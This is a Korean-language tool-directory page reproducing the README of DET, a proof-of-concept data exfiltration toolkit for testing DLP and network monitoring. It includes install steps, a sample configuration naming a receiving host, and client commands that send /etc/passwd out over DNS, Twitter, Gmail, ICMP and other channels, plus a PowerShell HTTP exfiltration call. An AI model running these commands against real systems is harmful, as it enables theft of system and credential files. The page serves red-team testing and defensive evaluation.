Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
DET — (확장 가능한) 데이터 유출 도구 키트 (DET) | Kitploit
도구/GitHubGitHub/sensepost/det
Encryption/Decryption ToolsData ExfiltrationNetwork SecurityPenetration TestingRed TeamingDNS Analysis
GitHubsensepost/det

DET

(확장 가능한) 데이터 유출 도구 키트 (DET)

저장소 보기
8211908년 전Kitploit 검토 완료

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

DET (확장 가능) 데이터 유출 툴킷

=======

DET (있는 그대로 제공됨)는 단일 또는 여러 채널을 동시에 사용하여 데이터 유출을 수행하는 개념 증명입니다.

이것은 가능한 DLP 실패를 식별하기 위한 개념 증명입니다. 이 도구는 절대 민감한/실제 데이터를 유출하는 데 사용되어서는 안 됩니다 (예: 평가에서).

아이디어는 다양한 데이터 유출 기술에 대해 구현된 네트워크 모니터링 및 데이터 유출 방지(DLP) 솔루션 구성을 테스트하기 위해 모든 종류의 프로토콜/서비스를 연결할 수 있는 일반적인 툴킷을 만드는 것이었습니다.

기본 저장소는 이제 여기로 이동했습니다.

슬라이드

DET는 2016년 3월 9일 BSides Ljubljana에서 발표되었으며 슬라이드는 여기에서 확인할 수 있습니다. 슬라이드는 여기에서 확인할 수 있습니다.

예제 사용법 (ICMP 플러그인)

서버 측:

asciicast

클라이언트 측:

asciicast

두 채널 결합 시 사용법 (Gmail/Twitter)

서버 측:

asciicast

클라이언트 측:

asciicast

설치

저장소를 클론합니다:

root@kitploit:~
git clone https://github.com/sensepost/DET.git

그런 다음:

root@kitploit:~
pip install -r requirements.txt --user

구성

DET를 사용하려면 구성하고 적절한 설정(예: SMTP/IMAP, AES256 암호화 암호 등)을 추가해야 합니다. 구성 예제 파일이 제공되며 이름은 config-sample.json입니다.

root@kitploit:~
{
    "plugins": {
        "http": {
            "target": "192.168.1.101",
            "port": 8080
        },
        "google_docs": {
            "target": "192.168.1.101",
            "port": 8080,
        },
        "dns": {
            "key": "google.com",
            "target": "192.168.1.101",
            "port": 53
        },
        "gmail": {
            "username": "[email protected]",
            "password": "ReallyStrongPassword",
            "server": "smtp.gmail.com",
            "port": 587
        },
        "tcp": {
            "target": "192.168.1.101",
            "port": 6969
        },
        "udp": {
            "target": "192.168.1.101",
            "port": 6969
        },
        "twitter": {
            "username": "PaulWebSec",
            "CONSUMER_TOKEN": "XXXXXXXXX",
            "CONSUMER_SECRET": "XXXXXXXXX",
            "ACCESS_TOKEN": "XXXXXXXXX",
            "ACCESS_TOKEN_SECRET": "XXXXXXXXX"
        },
        "icmp": {
            "target": "192.168.1.101"
        }
    },
    "AES_KEY": "THISISACRAZYKEY",
    "sleep_time": 10
}

사용법

도움말 사용법

root@kitploit:~
python det.py -h
usage: det.py [-h] [-c CONFIG] [-f FILE] [-d FOLDER] [-p PLUGIN] [-e EXCLUDE]
              [-L]

Data Exfiltration Toolkit (SensePost)

optional arguments:
  -h, --help  show this help message and exit
  -c CONFIG   Configuration file (eg. '-c ./config-sample.json')
  -f FILE     File to exfiltrate (eg. '-f /etc/passwd')
  -d FOLDER   Folder to exfiltrate (eg. '-d /etc/')
  -p PLUGIN   Plugins to use (eg. '-p dns,twitter')
  -e EXCLUDE  Plugins to exclude (eg. '-e gmail,icmp')
  -L          Server mode

서버 측:

모든 플러그인을 로드하려면:

root@kitploit:~
python det.py -L -c ./config.json

트위터와 지메일 모듈만 로드하려면:

root@kitploit:~
python det.py -L -c ./config.json -p twitter,gmail

모든 플러그인을 로드하고 DNS를 제외하려면:

root@kitploit:~
python det.py -L -c ./config.json -e dns

클라이언트 측:

모든 플러그인을 로드하려면:

root@kitploit:~
python det.py -c ./config.json -f /etc/passwd

트위터와 지메일 모듈만 로드하려면:

root@kitploit:~
python det.py -c ./config.json -p twitter,gmail -f /etc/passwd

모든 플러그인을 로드하고 DNS를 제외하려면:

root@kitploit:~
python det.py -c ./config.json -e dns -f /etc/passwd

PowerShell에서 (HTTP 모듈):

root@kitploit:~
PS C:\Users\user01\Desktop>
PS C:\Users\user01\Desktop> . .\http_exfil.ps1
PS C:\Users\user01\Desktop> HTTP-exfil 'C:\path\to\file.exe'

모듈

현재 DET는 여러 프로토콜을 지원하며, 다음과 같습니다:

  • HTTP(S)
  • ICMP
  • DNS
  • SMTP/IMAP (예: Gmail)
  • Raw TCP
  • PowerShell 구현 (HTTP, DNS, ICMP, SMTP (Gmail과 함께 사용))

그리고 기타 '서비스':

  • Google Docs (인증 없음)
  • Twitter (직접 메시지)

실험적 모듈

현재 곧 출시될 새로운 모듈을 구현 중이며, 다음을 포함합니다:

  • Skype (95% 완료)
  • Tor (80% 완료)
  • Github (30/40% 완료)

로드맵

  • 적절한 암호화 추가 (예: AES-256) ryanohoro님 감사합니다.
  • 압축 (매우 중요!) chokepoint님 감사합니다.
  • 적절한 데이터 난독화 및 Cloakify Toolset Toolset 통합
  • FTP, FlickR LSB 스테가노그래피 및 Youtube 모듈

참고 자료

제가 영감을 받은 프로젝트들의 멋진 참고 자료/크레딧입니다:

  • https://github.com/nullbind/Powershellery/ Nullbind의
  • https://github.com/ytisf/PyExfil, 정말 훌륭합니다.
  • https://github.com/m57/dnsteal m57의
  • https://github.com/3nc0d3r/NaishoDeNusumu 3nc0d3r의
  • https://github.com/glennzw/exphil Glenn Wilkinson의
  • Saif El-Sherei의 WebExfile

연락처/기여

트위터 @PaulWebSec로 연락하실 수 있습니다. 기여하고 싶다면 자유롭게 클론, 포크, PR 제출 등을 해주세요.

라이선스

DET는 MIT 라이선스에 따라 라이선스가 부여됩니다. 이 라이선스의 범위를 넘는 권한은 [email protected]에서 확인할 수 있습니다.

도구 다운로드